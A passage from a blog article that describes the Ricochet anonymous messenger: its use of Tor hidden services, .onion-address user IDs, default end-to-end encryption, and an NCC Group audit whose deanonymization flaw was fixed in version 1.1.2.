But one messenger app stands out from the crowd by providing superb anonymity to its users, and it is dubbed "Ricochet."

Ricochet is a peer-to-peer instant messaging system available for Windows, Mac, and Linux, and the project has already been through its first professional security audit, carried out by the cyber security company NCC Group.

What's so Promising about Ricochet?






Unlike other encrypted messaging clients, Ricochet uses Tor hidden services to maintain its users' anonymity.

Because it uses hidden services, a user's traffic never leaves the Tor network, which makes it much harder for prying eyes or any attacker to see where the traffic is going or coming from.

Peer-to-Peer Connection: No Servers! No Operators!


Ricochet does not trust anyone to maintain the privacy of its users; thus the developers built the app with no server or operator that could be compromised to expose your personal details.

"The concept with Ricochet is: how can we do messaging without any server in the middle—without trusting anything to forward your messages to your contacts" John Brooks (Ricochet program's maintainer) stated.

"That turns out to be exactly one of the problems that hidden services can solve: to contact someone, without anybody in the middle knowing who you are or who you're contacting."

Here's How Ricochet Works


Ricochet is cross-platform and very easy to use, even for non-technical users.

Your Username: A Unique .Onion Address






Every Ricochet client hosts a Tor hidden service, and once you sign up for Ricochet, that is actually your Ricochet ID: a unique .onion address.

Only someone who knows this .onion address can contact you and send you messages; contacts connect to you through Tor and not through any intermediate server, making it extremely hard for anyone to learn your real identity from your address.


Ricochet Creates Huge Spike in Hidden Addresses






Security researcher Alan Woodward noticed an unprecedented spike in the number of unique .onion hidden service addresses on the Tor network in February.

Statistics shared by the Tor Project show that the number of unique .onion addresses increased by more than 25,000 within 2-3 days.

The researcher believes this sudden rise could be due to the popularity of Ricochet, which creates a unique .onion address for every user.

Your Messages: End-to-End Encrypted By Default


Besides this, Ricochet also encrypts the contents of your messages by default.

So, to start chatting with someone over Ricochet, you first need to know their unique Ricochet ID, which is generated automatically when Ricochet is installed.

Moreover, once the connection is terminated by either the sender or the receiver, the other side can no longer communicate with or send messages to them.

Ricochet Takes Your Security Seriously


The audit by NCC Group discovered a security flaw that could be exploited to deanonymize users, but the good news is that the issue has been resolved in the latest release, Ricochet 1.1.2.

The security vulnerability was independently discovered by a member of the Ricochet community.

Ricochet has been around since 2014 and is now considerably more secure than other existing encrypted messaging apps. But the app is still in the dogfooding stage, and Brooks points to the "Be Careful" statement on the project's official website:

"Ricochet is an experiment. Security and anonymity are difficult topics, and you should carefully evaluate your risks and exposure with any software."

Download Ricochet

Copyright © Offensive Sec Blog | Powered by OffensiveSec
Design by OffSec | Theme by Nasa Records | Distributed By Pirate Edition